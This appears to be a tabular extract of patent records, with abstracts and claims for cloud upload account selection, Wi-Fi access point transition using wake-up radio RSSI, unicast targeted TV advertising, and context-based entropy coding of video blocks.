9,126 | 9,126 | 15,600,619 | 2,492 | Technologies are described herein for analyzing data to determine an upload account. In some configurations, techniques disclosed herein cause the data, and other data, to be analyzed to determine whether the data is to be uploaded to a business account associated with the user or a personal account associated with the user. A request to upload data is received from a computing device. Instead of prompting a user to manually select whether to upload the data to the personal account or the business account, the techniques determine whether the data is personal or business related. When the data is determined to be personal, the data is uploaded to the personal account. When the data is determined to be business related, the data is uploaded to the business account. | 1. A computer-implemented method comprising:
obtaining, from a computing device associated with a user, a request to store a file; obtaining contextual data from one or more data sources that includes data associated with the user, wherein the contextual data includes one or more of a calendar data, organizational data, contact data, social network data, and document management data; analyzing at least a portion of the file and the contextual data obtained from the one or more data sources to determine whether the file is a personal category or a business category; selecting a first account associated with the user and causing the file to be stored in the first account when it is determined that the file is the personal category; and selecting a second account associated with the user and causing the file to be stored in the second account when it is determined that the file is the business category. 2. The computer-implemented method of claim 1, wherein analyzing the at least the portion of the file and the contextual data comprises identifying from the contextual data one or more of a business contact of the user or a business activity of the user that is identified from an analysis of the file. 3. The computer-implemented method of claim 1, wherein analyzing the at least the portion of the file and the contextual data comprises identifying keywords from the file and determining whether the keywords are business related, and wherein selecting the second account is based at least in part on determining that the keywords are business related. 4. The computer-implemented method of claim 1, wherein the file is photographic data, and wherein analyzing the file and the contextual data includes identifying an individual depicted within photographic data and determining from the contextual data that the individual is a business contact of the user or a personal contact of the user. 5. 
The computer-implemented method of claim 1, wherein the first account is a personal account and the second account is a business account. 6. The computer-implemented method of claim 1, wherein selecting the account comprises utilizing a machine learning mechanism. 7. The computer-implemented method of claim 1, further comprising determining one or more individuals to recommend to share the file with based, at least in part, on contents of the file and the analysis of the contextual data. 8. A computer, comprising:
a processor; and a computer-readable storage medium in communication with the processor, the computer-readable storage medium having computer-executable instructions stored thereupon which, when executed by the processor, cause the computer to obtain, from a remote computer, a request to store first data within an account of a storage service, wherein the account is associated with a user; access second data associated with the user, wherein the second data includes one or more of a calendar data, organizational data, contact data, social network data, and document management data; analyze the first data and the second data to determine that the first data is personal or business related; select the account from at least a personal account and a business account; and cause the first data to be stored in the account. 9. The computer of claim 8, wherein analyzing the first data and the second data comprises identifying from the contact data that the first data is associated with a business contact or a personal contact of the user. 10. The computer of claim 8, wherein analyzing the first data and the second data comprises identifying one or more individuals or keywords from the first data and determining that the one or more individuals or keywords are business related, and wherein selecting the account is based at least in part on determining that the one or more individuals or keywords are business related. 11. The computer of claim 8, wherein the first data is photographic data, and wherein analyzing the first data and the second data includes identifying one or more of an individual depicted within photographic data or a location associated with the photographic data. 12. The computer of claim 8, wherein selecting the account comprises utilizing a machine learning mechanism. 13. 
The computer of claim 8, wherein the computer-executable instructions further cause the computer to identify one or more individuals to share the first data with based, at least in part, on contents of the first data and the second data. 14. The computer of claim 13, wherein the computer-executable instructions further cause the computer to provide for display the identification of the one or more individuals. 15. A computer-readable storage medium having computer-executable instructions stored thereupon which, when executed by a computer, cause the computer to:
obtain, from a remote computer, a request to store a file in an account of a storage service; obtain, from one or more data sources, second data associated with a user, wherein the second data includes one or more of a calendar data, organizational data, contact data, social network data, and document management data; cause a machine learning mechanism to determine that the first data is personal or business related based, at least in part, on the first data and the second data; select the account of the storage service from at least a personal account of the user and a business account of the user based at least in part on the determination that the first data is personal or business related; and cause the first data to be stored in the account. 16. The computer-readable storage medium of claim 15, wherein the computer-executable instructions further cause the computer to identify keywords from the first data. 17. The computer-readable storage medium of claim 16, wherein the keywords are provided to the machine learning mechanism. 18. The computer-readable storage medium of claim 15, wherein the computer-executable instructions further cause the computer to identify from the first data an individual and determine that the individual is a business contact or a personal contact. 19. The computer-readable storage medium of claim 15, wherein the first data is photographic data and wherein the computer-executable instructions further cause the computer to identify an individual depicted by the photographic data and determine that the individual is a contact of the user. 20. The computer-readable storage medium of claim 15, wherein the computer-executable instructions further cause the computer to identify one or more individuals to share the first data with based, at least in part, on contents of the first data and the second data. | 2,400 |
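The personal-versus-business routing described in this record can be illustrated with a small heuristic classifier. The keyword set, scoring rule, and function names below are invented for the sketch; the claims themselves contemplate a trained machine learning mechanism (claim 6) operating over contextual data such as contacts and calendars, not this hand-written rule.

```python
# Placeholder vocabulary; a real system would learn these signals.
BUSINESS_KEYWORDS = {"invoice", "meeting", "quarterly", "client"}

def classify(file_text, business_contacts, mentioned_names):
    """Return 'business' or 'personal' from file contents plus contextual data."""
    words = set(file_text.lower().split())
    score = len(words & BUSINESS_KEYWORDS)          # keywords identified from the file
    # Contextual data: is any individual named in the file a business contact?
    score += sum(1 for name in mentioned_names if name in business_contacts)
    return "business" if score > 0 else "personal"

def upload(file_text, business_contacts, mentioned_names, accounts):
    """Select the personal or business account and store the file there."""
    category = classify(file_text, business_contacts, mentioned_names)
    accounts[category].append(file_text)
    return category
```

The point of the sketch is the routing step: instead of prompting the user, the store request is dispatched to `accounts["personal"]` or `accounts["business"]` based on the classification.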
9,127 | 9,127 | 15,391,332 | 2,416 | A wireless communication device, a system, and a method. The device may use memory circuitry and processing circuitry to process a packet wirelessly transmitted to the STA from a serving AP. The packet may be configured according to a first wireless communication protocol from a serving AP, such as, for example, WLAN. The wireless communication device may further process a low modulation packet configured according to a second wireless communication protocol from a candidate access point, the low modulation packet being at a modulation rate lower than a lowest modulation rate for the first wireless communication protocol. The second wireless communication protocol may be the LP-WU radio communication protocol. The device may determine a received signal strength indicator (RSSI) value of the low modulation packet, and may further process a frame including information on an address or signature, such as a Service Set Identifier (SSID) for the serving AP corresponding to the candidate access point, the frame being from the serving access point, from the candidate access point, or from another wireless communication device. The device may then associate the RSSI value with the address of the candidate access point, and trigger transition of the device from the serving access point to the candidate access point based on the RSSI value and on the address of the candidate access point. | 1. A wireless communication device including a memory and processing circuitry coupled to the memory and including logic to:
process a packet configured according to a first wireless communication protocol from a serving access point; process a low modulation packet configured according to a second wireless communication protocol from a candidate access point, the low modulation packet being at a modulation rate lower than a lowest modulation rate for the first wireless communication protocol; process a frame including information on an address of the candidate access point, the frame being from the serving access point, from the candidate access point, or from another wireless communication device; associate an RSSI value of the low modulation packet with the address of the candidate access point; and trigger transition of the device from the serving access point to the candidate access point based on the RSSI value and on the address of the candidate access point. 2. The device of claim 1, wherein:
the second wireless communication protocol includes a low-power wake-up receiver (LP-WUR) protocol conforming to Institute for Electronic and Electrical Engineers (IEEE) 802.11 standard, the modulation rate of the low modulation packet being an On-Off Keying (OOK) modulation rate; and the first wireless communication protocol includes a standard from an 802.11 standards family of the Institute for Electronic and Electrical Engineers (IEEE), the lowest modulation rate being a Binary Phase Shift Keying (BPSK) modulation rate. 3. The device of claim 1, wherein:
the candidate access point includes a plurality of candidate access points; the address of a candidate access point includes a plurality of addresses for respective ones of the candidate access points; the low modulation packet includes a plurality of low modulation packets, each of the low modulation packets further being from a corresponding one of the candidate access points and further being at a modulation rate lower than a lowest modulation rate for the first wireless communication protocol; the RSSI value includes a plurality of RSSI values for each of the low modulation packets; and the logic is to trigger transition of the device from the serving access point to one of the plurality of candidate access points based on the RSSI values and the corresponding addresses of the candidate access points. 4. The device of claim 1, wherein the frame is a neighbor report frame from the serving access point configured according to the first wireless communication protocol, the neighbor report frame including information on a timing for a transmission of the low modulation packet from the candidate access point to allow the logic to associate the RSSI value with the address of the candidate access point, the information on the timing for the transmission of the low modulation packet including at least one of a target transmission time of the low modulation packet and an interval at which the low modulation packet is to be transmitted. 5. The device of claim 1, wherein the frame includes the low modulation packet and is from the candidate access point, and wherein the low modulation packet includes the information on the address of the candidate access point. 6. The device of claim 1, wherein the frame is from the serving access point, the device further including logic to:
determine an RSSI value of the packet configured according to the first wireless communication protocol from the serving access point or of the frame sent from the serving access point; trigger transition of the device from the serving access point to the candidate access point based on a comparison of the RSSI value of the low modulation packet with the RSSI value of the packet configured according to the first wireless communication protocol from the serving access point or of the frame sent from the serving access point. 7. The device of claim 1, wherein the logic is further to compare the RSSI value of the low modulation packet from the candidate access point with an RSSI value associated with the serving access point or with other candidate access points, and to trigger transition to one of the candidate access points associated with a highest RSSI value, or to one of the candidate access points with an RSSI value above a predetermined RSSI threshold value. 8. The device of claim 1, further including:
a first radio and first front-end module to carry signals configured according to the first wireless communication protocol; a first baseband processor connected to the first radio and first front-end module; a second radio and second front-end module to carry signals configured according to the second wireless communication protocol; a second baseband processor connected to the second radio and second front-end module; and one or more antennas connected to the first front-end module and the second front-end module to communicate signals configured according to the first wireless communication protocol and the second wireless communication protocol. 9. The device of claim 1, wherein the packet configured according to the first wireless communication protocol from the serving access point and the low modulation packet configured according to the second wireless communication protocol from the candidate access point both have a legacy PHY preamble according to the first wireless communication protocol. 10. A product comprising one or more tangible computer-readable non-transitory storage media comprising computer-executable instructions operable to, when executed by at least one computer processor, enable the at least one computer processor to implement operations at a wireless communication device, the operations comprising:
processing a packet configured according to a first wireless communication protocol from a serving access point, processing a low modulation packet configured according to a second wireless communication protocol from a candidate access point, the low modulation packet being at a modulation rate lower than a lowest modulation rate for the first wireless communication protocol; determining a received signal strength indicator (RSSI) value of the low modulation packet; processing a frame including information on an address of the candidate access point, the frame being from the serving access point, from the candidate access point, or from another wireless communication device; associating the RSSI value with the address of the candidate access point; triggering transition of the device from the serving access point to the candidate access point based on the RSSI value and on the address of the candidate access point. 11. The product of claim 10, wherein:
the second wireless communication protocol includes a low-power wake-up receiver (LP-WUR) protocol conforming to Institute for Electronic and Electrical Engineers (IEEE) 802.11 standard, and the modulation rate of the low modulation packet is an On-Off Keying (OOK) modulation rate; and the first communication protocol includes a standard from an 802.11 standards family of the Institute for Electronic and Electrical Engineers (IEEE), the lowest modulation rate being a Binary Phase Shift Keying (BPSK) modulation rate. 12. The product of claim 10, wherein the frame is a neighbor report frame from the serving access point, the neighbor report frame including information on a timing for a transmission of the low modulation packet from the candidate access point to allow the logic to associate the RSSI value with the address of the candidate access point. 13. The product of claim 10, wherein the frame includes the low modulation packet and is from the candidate access point, and wherein the low modulation packet includes the information on the address of the candidate access point. 14. The product of claim 10, wherein the frame is from the serving access point, the device further including logic to:
determine an RSSI value of the packet configured according to the first wireless communication protocol from the serving access point or of the frame sent from the serving access point; trigger transition of the device from the serving access point to the candidate access point based on a comparison of the RSSI value of the low modulation packet with the RSSI value of the packet configured according to the first wireless communication protocol from the serving access point or of the frame sent from the serving access point. 15. The product of claim 10, further including:
a first radio and first front-end module to carry signals configured according to the first wireless communication protocol; a first baseband processor connected to the first radio and first front-end module; a second radio and second front-end module to carry signals configured according to the second wireless communication protocol; a second baseband processor connected to the second radio and second front-end module; and one or more antennas connected to the first and second front-end modules. 16. The product of claim 10, wherein the packet configured according to the first wireless communication protocol from the serving access point and the low modulation packet configured according to the second wireless communication protocol from the candidate access point both have a legacy PHY preamble according to the first wireless communication protocol. 17. A wireless communication device including:
a memory; processing circuitry coupled to the memory and including logic to:
process a packet configured according to a first wireless communication protocol from a wireless station;
cause transmission to the wireless station of a low modulation packet configured according to a second wireless communication protocol, the low modulation packet being at a modulation rate lower than a lowest modulation rate for the first wireless communication protocol;
wherein the packet configured according to the first wireless communication protocol and the low modulation packet configured according to the second wireless communication protocol both have a legacy PHY preamble according to the first wireless communication protocol. 18. The device of claim 17, wherein:
the second wireless communication protocol includes a low-power wake-up receiver (LP-WUR) protocol conforming to Institute for Electronic and Electrical Engineers (IEEE) 802.11 standard; and the first communication protocol includes a standard from an 802.11 standards family of the Institute for Electronic and Electrical Engineers (IEEE), the lowest modulation rate being a Binary Phase Shift Keying (BPSK) modulation rate. 19. The device of claim 17, wherein the logic is further to cause transmission of a neighbor report frame configured according to the first wireless communication protocol or to another wireless communication protocol and including information on a timing for a transmission of the low modulation packet, the information on the timing for the transmission of the low modulation packet including at least one of a target transmission time of the low modulation packet and an interval at which the low modulation packet is to be transmitted. 20. The device of claim 17, wherein the wireless communication device is to be used as part of an access point, and wherein the low modulation packet includes information on an address of the access point. 21. The device of claim 17, further including:
a first radio and first front-end module to carry signals configured according to the first wireless communication protocol; a first baseband processor connected to the first radio and first front-end module; a second radio and second front-end module to carry signals configured according to the second wireless communication protocol; and a second baseband processor connected to the second radio and second front-end module. 22. A product comprising one or more tangible computer-readable non-transitory storage media comprising computer-executable instructions operable to, when executed by at least one computer processor, enable the at least one computer processor to implement operations at a wireless communication device, the operations comprising:
processing a packet configured according to a first wireless communication protocol from a wireless station; causing transmission to the wireless station of a low modulation packet configured according to a second wireless communication protocol, the low modulation packet being at a modulation rate lower than a lowest modulation rate for the first wireless communication protocol; wherein the packet configured according to the first wireless communication protocol and the low modulation packet configured according to the second wireless communication protocol both have a legacy PHY preamble according to the first wireless communication protocol. 23. The product of claim 22, wherein:
the second wireless communication protocol includes a low-power wake-up receiver (LP-WUR) protocol conforming to Institute for Electronic and Electrical Engineers (IEEE) 802.11 standard, and the modulation rate of the low modulation packet is an On-Off Keying (OOK) modulation rate; and the first communication protocol includes a standard from an 802.11 standards family of the Institute for Electronic and Electrical Engineers (IEEE), the lowest modulation rate being a Binary Phase Shift Keying (BPSK) modulation rate. 24. The product of claim 22, wherein the wireless communication device is to be used as part of an access point, and wherein the low modulation packet includes information on an address of the access point. 25. The product of claim 22, wherein the packet configured according to the first wireless communication protocol is a neighbor report frame from the serving access point, the neighbor report frame including information on a timing for a transmission of the low modulation packet from the candidate access point to allow the logic to associate an RSSI value with the address of the candidate access point. | A wireless communication device, a system, and a method. The device may use memory circuitry and processing circuitry to process a packet wirelessly transmitted to the STA from a serving AP. The packet may be configured according to a first wireless communication protocol from a serving AP, such as, for example, WLAN. The wireless communication device may further process a low modulation packet configured according to a second wireless communication protocol from a candidate access point, the low modulation packet being at a modulation rate lower than a lowest modulation rate for the first wireless communication protocol. The second wireless communication protocol may be the LP-WU radio communication protocol. 
The device may determine a received signal strength indicator (RSSI) value of the low modulation packet, and may further process a frame including information on an address or signature, such as a Service Set Identifier (SSID) for the serving AP corresponding to the candidate access point, the frame being from the serving access point, from the candidate access point, or from another wireless communication device. The device may then associate the RSSI value with the address of the candidate access point, and trigger transition of the device from the serving access point to the candidate access point based on the RSSI value and on the address of the candidate access point. | 2,400
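The transition rule recited in claims 1 and 7 above — associate each candidate access point's address with the RSSI measured from its low modulation (e.g., LP-WUR/OOK) packet, then move to the candidate with the highest RSSI, or to one whose RSSI exceeds a predetermined threshold — can be sketched as follows. This is a minimal illustration with invented names and a combined comparison policy, not the patented implementation:

```python
def select_transition_target(serving_rssi, candidate_rssi_by_addr, threshold=-70):
    """Pick a candidate AP to transition to, in the style of claim 7.

    candidate_rssi_by_addr maps a candidate AP address to the RSSI (dBm)
    measured from that AP's low modulation packet. Returns the address of
    the chosen candidate, or None to remain on the serving AP.
    """
    if not candidate_rssi_by_addr:
        return None  # no candidates reported; stay on the serving AP
    # Candidate whose low modulation packet had the highest RSSI.
    best_addr = max(candidate_rssi_by_addr, key=candidate_rssi_by_addr.get)
    best_rssi = candidate_rssi_by_addr[best_addr]
    # Transition only if the best candidate beats the serving AP's RSSI
    # and clears the predetermined RSSI threshold.
    if best_rssi > serving_rssi and best_rssi >= threshold:
        return best_addr
    return None
```

Here the "highest RSSI" and "above a predetermined RSSI threshold value" alternatives of claim 7 are combined into one policy; an implementation could apply either criterion alone.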
9,128 | 9,128 | 14,098,511 | 2,421 | Methods and apparatus relating to the supply of targeted advertisements to user devices receiving broadcast or multicast content are described. The methods and apparatus are well suited for systems where content is broadcast or multicast to a plurality of user playback devices, e.g., set top boxes, with advertisements included in the content delivered via a first communications channel, e.g., a broadcast communications channel. Viewing information, e.g., information indicating the tuning of a customer premise device to a channel and/or the outputting of program content, is reported to a headend or other device. One or more targeted advertisements are delivered to a customer premise device via a secondary channel, e.g., a unicast IP packet channel, with an alternative advertisement displayed in place of the broadcast advertisement. | 1. A method of operating a customer premise device, the method comprising:
outputting program content received on a first communications channel, said first communications channel being a broadcast channel or a multicast digital video channel; communicating viewing information to a device used to control transmission of advertising content via a second communications channel, said second communications channel being different from said first communications channel; and outputting, during a commercial break which occurs on said broadcast channel or multicast digital video channel, advertising content communicated via said second communications channel. 2. The method of claim 1, wherein said advertising content is communicated via a unicast Internet Protocol (IP) packet stream over said second communications channel. 3. The method of claim 1, further comprising:
monitoring said program content received on said first channel to detect an indicator of an upcoming commercial break; and sending said viewing information to said device after detecting said indicator of an upcoming commercial break. 4. The method of claim 3, wherein monitoring said program content received on said first channel to detect an indicator of an upcoming commercial break includes monitoring for indicators/identifiers indicating the start and the end or duration of the upcoming commercial break. 5. The method of claim 1, wherein said viewing information includes information identifying the program content being output by said customer premise device. 6. The method of claim 5, wherein said viewing information further includes information indicating the current position within said program content which is being output. 7. The method of claim 6, further comprising:
transmitting user information from said customer premise device to said device, said user information including at least some user profile information. 8. The method of claim 5, further comprising:
receiving said advertising content from a video on demand server; and switching, during said commercial break, said customer premise device from outputting content received on said first communications channel to outputting content communicated via said second communications channel. 9. The method of claim 8, wherein at least some of the content output during said commercial break is received during said commercial break. 10. A customer device, comprising:
an output control module configured to output program content received on a first communications channel, said first communications channel being a broadcast channel or a multicast digital video channel; a communications module configured to communicate viewing information to a device used to control transmission of advertising content via a second communications channel, said second communications channel being different from said first communications channel; and wherein said output control module is further configured to output, during a commercial break which occurs on said broadcast channel or multicast digital video channel, advertising content communicated via said second communications channel. 11. The customer device of claim 10, wherein said advertising content is communicated via a unicast Internet Protocol (IP) packet stream over said second communications channel. 12. The customer device of claim 11, further comprising:
a commercial break detection module configured to monitor said program content received on said first channel to detect an indicator of an upcoming commercial break; and wherein said communications module is configured to communicate said viewing information to said device after detecting said indicator of an upcoming commercial break. 13. The customer device of claim 12, wherein said commercial break detection module is configured to monitor for indicators/identifiers indicating the start and the end or duration of the upcoming commercial break, as part of being configured to monitor the program content received on said first channel to detect an indicator of an upcoming commercial break. 14. The customer device of claim 10, wherein said viewing information includes information identifying the program content being output by said customer device. 15. The customer device of claim 14, wherein said viewing information further includes information indicating the current position within said program content which is being output. 16. A method of providing advertising content to a playback device, the method comprising:
receiving, at a control device, a tuning message including tuning information from a customer premise device indicating a broadcast channel to which the customer premise device is tuned and information identifying the customer premise device; determining when advertisement segments occur within the broadcast content on the indicated broadcast channel to which the customer premise device has tuned; and transmitting alternative advertisement content via unicast transmissions directed to said customer premise device to be output by said customer premise device in place of advertising content, corresponding to one or more broadcast advertisement segments, received by said customer premise device via said broadcast channel. 17. The method of claim 16, further comprising:
identifying a customer associated with said customer premise device; and selecting said alternative advertisement content based on customer information about said customer which is used for advertisement targeting purposes. 18. The method of claim 16, wherein transmitting alternative advertisement content via unicast transmissions includes transmitting a unicast IP packet stream including unicast IP packets including a destination IP address corresponding to a device located at a customer premise where said customer premise device is located. 19. The method of claim 18, wherein said device located at the customer premise is one of a gateway device or said customer premise device. 20. The method of claim 19,
wherein said device located at the customer premise is said gateway device, the method further comprising: operating the gateway device to transcode or transrate advertising content included in the unicast IP packets included in said unicast IP packet stream; operating the gateway device to transmit said transcoded or transrated advertising content to said customer premise device via a home network; monitoring, at the control device, for additional messages relating to said customer premise device; and transmitting, from the control device, alternative advertisement content via unicast IP packets for the advertisement segments of a program being broadcast at the time said tuning message is received absent receipt of a message indicating tuning to a different broadcast channel or powering off of a tuner of said customer premise device. | Methods and apparatus relating to the supply of targeted advertisements to user devices receiving broadcast or multicast content are described. The methods and apparatus are well suited for systems where content is broadcast or multicast to a plurality of user playback devices, e.g., set top boxes, with advertisements included in the content delivered via a first communications channel, e.g., a broadcast communications channel. Viewing information, e.g., information indicating the tuning of a customer premise device to a channel and/or the outputting of program content is reported to a headend or other device. One or more targeted advertisements are delivered to a customer premise device via a secondary channel, e.g., unicast IP packet channel, with the alternative advertisement being displayed in place of the broadcast advertisement. 1. A method of operating a customer premise device, the method comprising:
outputting program content received on a first communications channel, said first communications channel being a broadcast channel or a multicast digital video channel; communicating viewing information to a device used to control transmission of advertising content via a second communications channel, said second communications channel being different from said first communications channel; and outputting, during a commercial break which occurs on said broadcast channel or multicast digital video channel, advertising content communicated via said second communications channel. 2. The method of claim 1, wherein said advertising content is communicated via a unicast Internet Protocol (IP) packet stream over said second communications channel. 3. The method of claim 1, further comprising:
monitoring said program content received on said first channel to detect an indicator of an upcoming commercial break; and sending said viewing information to said device after detecting said indicator of an upcoming commercial break. 4. The method of claim 3, wherein monitoring said program content received on said first channel to detect an indicator of an upcoming commercial break includes monitoring for indicators/identifiers indicating the start and the end or duration of the upcoming commercial break. 5. The method of claim 1, wherein said viewing information includes information identifying the program content being output by said customer device. 6. The method of claim 5, wherein said viewing information further includes information indicating the current position within said program content which is being output. 7. The method of claim 6, further comprising:
transmitting user information from said customer premise device to said device, said user information including at least some user profile information. 8. The method of claim 5, further comprising:
receiving said advertising content from a video on demand server; and switching, during said commercial break, said customer premise device from outputting content received on said first communications channel to outputting content communicated via said second communications channel. 9. The method of claim 8, wherein at least some of the content output during said commercial break is received during said commercial break. 10. A customer device, comprising:
an output control module configured to output program content received on a first communications channel, said first communications channel being a broadcast channel or a multicast digital video channel; a communications module configured to communicate viewing information to a device used to control transmission of advertising content via a second communications channel, said second communications channel being different from said first communications channel; and wherein said output control module is further configured to output, during a commercial break which occurs on said broadcast channel or multicast digital video channel, advertising content communicated via said second communications channel. 11. The customer device of claim 10, wherein said advertising content is communicated via a unicast Internet Protocol (IP) packet stream over said second communications channel. 12. The customer device of claim 11, further comprising:
a commercial break detection module configured to monitor said program content received on said first channel to detect an indicator of an upcoming commercial break; and wherein said communications module is configured to communicate said viewing information to said device after detecting said indicator of an upcoming commercial break. 13. The customer device of claim 12, wherein said commercial break detection module is configured to monitor for indicators/identifiers indicating the start and the end or duration of the upcoming commercial break, as part of being configured to monitor the program content received on said first channel to detect an indicator of an upcoming commercial break. 14. The customer device of claim 10, wherein said viewing information includes information identifying the program content being output by said customer device. 15. The customer device of claim 14, wherein said viewing information further includes information indicating the current position within said program content which is being output. 16. A method of providing advertising content to a playback device, the method comprising:
receiving, at a control device, a tuning message including tuning information from a customer premise device indicating a broadcast channel to which the customer premise device is tuned and information identifying the customer premise device; determining when advertisement segments occur within the broadcast content on the indicated broadcast channel to which the customer premise device has tuned; and transmitting alternative advertisement content via unicast transmissions directed to said customer premise device to be output by said customer premise device in place of advertising content, corresponding to one or more broadcast advertisement segments, received by said customer premise device via said broadcast channel. 17. The method of claim 16, further comprising:
identifying a customer associated with said customer premise device; and selecting said alternative advertisement content based on customer information about said customer which is used for advertisement targeting purposes. 18. The method of claim 16, wherein transmitting alternative advertisement content via unicast transmissions includes transmitting a unicast IP packet stream including unicast IP packets including a destination IP address corresponding to a device located at a customer premise where said customer premise device is located. 19. The method of claim 18, wherein said device located at the customer premise is one of a gateway device or said customer premise device. 20. The method of claim 19,
wherein said device located at the customer premise is said gateway device, the method further comprising: operating the gateway device to transcode or transrate advertising content included in the unicast IP packets included in said unicast IP packet stream; and operating the gateway device to transmit said transcoded or transrated advertising content to said customer premise device via a home network; monitoring, at the control device, for additional messages relating to said customer premise device; and transmitting, from the control device, alternative advertisement content via unicast IP packets for the advertisement segments of a program being broadcast at the time said tuning message is received absent receipt of a message indicating tuning to a different broadcast channel or powering off of a tuner of said customer premise device. | 2,400 |
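The control-device flow in claims 16-18 above (receive a tuning message, determine upcoming advertisement segments on the reported channel, and direct unicast substitute ads to the identified customer premise) can be sketched as below. This is a minimal illustrative sketch, not the patented implementation: all names (`TuningMessage`, `handle_tuning_message`, `select_targeted_ad`, the dict shapes) are assumptions introduced for the example.

```python
from dataclasses import dataclass

@dataclass
class TuningMessage:
    device_id: str   # identifies the customer premise device (claim 16)
    channel: int     # broadcast channel the device has tuned to (claim 16)

def select_targeted_ad(profile):
    # Stand-in for targeting logic driven by customer information (claim 17).
    return "sports_ad" if "sports" in profile else "generic_ad"

def handle_tuning_message(msg, ad_segments_by_channel, customers):
    """Queue one unicast delivery per upcoming advertisement segment on the
    channel reported in the tuning message, addressed to the customer premise."""
    customer = customers[msg.device_id]                    # claim 17: identify customer
    deliveries = []
    for seg_start in ad_segments_by_channel[msg.channel]:  # claim 16: segment timing
        deliveries.append({
            "dest_ip": customer["premise_ip"],             # claim 18: unicast IP destination
            "segment_start": seg_start,
            "content": select_targeted_ad(customer["profile"]),
        })
    return deliveries
```

The sketch deliberately returns a delivery queue rather than sending packets, since the claims leave transport (direct to the set top box or via a gateway, claim 19) open.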
9,129 | 9,129 | 15,668,745 | 2,485 | Systems and methods are disclosed for entropy coding of blocks of image data. For example, methods may include partitioning a block of video data into a plurality of groups of elements; decoding, using an entropy decoder, data from an encoded bitstream to obtain elements of a first group from the plurality of groups of elements; determining a category based on the elements of the first group; based on the category, selecting a context for an element from a second group from the plurality of groups of elements; and decoding, using the entropy decoder using the context, data from the encoded bitstream to obtain the element of the second group from the plurality of groups of elements. | 1. A system for decoding video, comprising:
a memory; and a processor, wherein the memory stores instructions executable by the processor to cause the system to:
partition a block of video data into a plurality of groups of elements;
decode, using an entropy decoder, data from an encoded bitstream to obtain elements of a first group from the plurality of groups of elements;
determine a category based on the elements of the first group;
based on the category, select a context for an element from a second group from the plurality of groups of elements; and
decode, using the entropy decoder using the context, data from the encoded bitstream to obtain the element of the second group from the plurality of groups of elements. 2. The system of claim 1, wherein the elements of the block are quantized transform coefficients. 3. The system of claim 1, wherein the first group includes elements of a first row of the block and elements of a first column of the block. 4. The system of claim 1, wherein the first group includes elements forming a triangle in a corner of the block, and wherein the triangle includes elements of a first row of the block and elements of a first column of the block. 5. The system of claim 4, wherein the first group includes elements of a first row of the block that are outside of the triangle and elements of a first column of the block that are outside of the triangle. 6. The system of claim 1, wherein the second group includes all remaining elements of the block outside of the first group. 7. The system of claim 1, wherein the memory stores instructions executable by the processor to cause the system to:
determine, based on the category, a scan order for the second group from the plurality of groups of elements; and decode, using the entropy decoder, data from the encoded bitstream to obtain, using the scan order, elements of the second group from the plurality of groups of elements. 8. The system of claim 1, wherein the category is one of horizontal, vertical, diagonal-left, and diagonal-right. 9. The system of claim 1, wherein the instructions for determining the category based on the elements of the first group include instructions executable by the processor to cause the system to:
determine a first count of non-zero elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determine a second count of non-zero elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determine the category based on the first count and the second count. 10. The system of claim 1, wherein the instructions for determining the category based on the elements of the first group include instructions executable by the processor to cause the system to:
determine a first sum of magnitudes of elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determine a second sum of magnitudes of elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determine the category based on the first sum and the second sum. 11. The system of claim 1, wherein the instructions for determining the category based on the elements of the first group include instructions executable by the processor to cause the system to:
determine a first count of non-zero elements in a portion of a first row of the block; determine a second count of non-zero elements in a portion of a first column of the block; and responsive to the first count being zero and the second count being positive, determine the category to be a value corresponding to a vertical scan order. 12. The system of claim 1, wherein the instructions for determining the category based on the elements of the first group include instructions executable by the processor to cause the system to:
determine a first sum of magnitudes of elements in a portion of a first row of the block; determine a second sum of magnitudes of elements in a portion of a first column of the block; and responsive to the first sum being positive and the second sum being zero, determine the category to be a value corresponding to a horizontal scan order. 13. The system of claim 1, wherein the elements of the block each represent a sub-block of quantized transform coefficients. 14. A method for decoding video comprising:
partitioning a block of video data into a plurality of groups of elements; decoding, using an entropy decoder, data from an encoded bitstream to obtain elements of a first group from the plurality of groups of elements; determining a category based on the elements of the first group; based on the category, selecting a context for an element from a second group from the plurality of groups of elements; and decoding, using the entropy decoder using the context, data from the encoded bitstream to obtain the element of the second group from the plurality of groups of elements. 15. The method of claim 14, wherein the elements of the block are quantized transform coefficients, and further comprising:
displaying video that is generated based in part on decoded elements of the block. 16. A system for encoding video, comprising:
a memory; and a processor, wherein the memory stores instructions executable by the processor to cause the system to:
partition a block of video data into a plurality of groups of elements;
encode, using an entropy encoder, elements of a first group from the plurality of groups of elements;
determine a category based on the elements of the first group;
based on the category, select a context for an element from a second group from the plurality of groups of elements; and
encode, using the entropy encoder using the context, the element of the second group from the plurality of groups of elements. 17. The system of claim 16, wherein the elements of the block are quantized transform coefficients. 18. The system of claim 16, wherein the first group includes elements of a first row of the block and elements of a first column of the block. 19. The system of claim 16, wherein the first group includes elements forming a triangle in a corner of the block, and wherein the triangle includes elements of a first row of the block and elements of a first column of the block. 20. The system of claim 19, wherein the first group includes elements of a first row of the block that are outside of the triangle and elements of a first column of the block that are outside of the triangle. 21. The system of claim 16, wherein the second group includes all remaining elements of the block outside of the first group. 22. The system of claim 16, wherein the memory stores instructions executable by the processor to cause the system to:
determine, based on the category, a scan order for the second group from the plurality of groups of elements; and encode, using the entropy encoder using the scan order, elements of the second group from the plurality of groups of elements. | Systems and methods are disclosed for entropy coding of blocks of image data. For example, methods may include partitioning a block of video data into a plurality of groups of elements; decoding, using an entropy decoder, data from an encoded bitstream to obtain elements of a first group from the plurality of groups of elements; determining a category based on the elements of the first group; based on the category, selecting a context for an element from a second group from the plurality of groups of elements; and decoding, using the entropy decoder using the context, data from the encoded bitstream to obtain the element of the second group from the plurality of groups of elements. 1. A system for decoding video, comprising:
a memory; and a processor, wherein the memory stores instructions executable by the processor to cause the system to:
partition a block of video data into a plurality of groups of elements;
decode, using an entropy decoder, data from an encoded bitstream to obtain elements of a first group from the plurality of groups of elements;
determine a category based on the elements of the first group;
based on the category, select a context for an element from a second group from the plurality of groups of elements; and
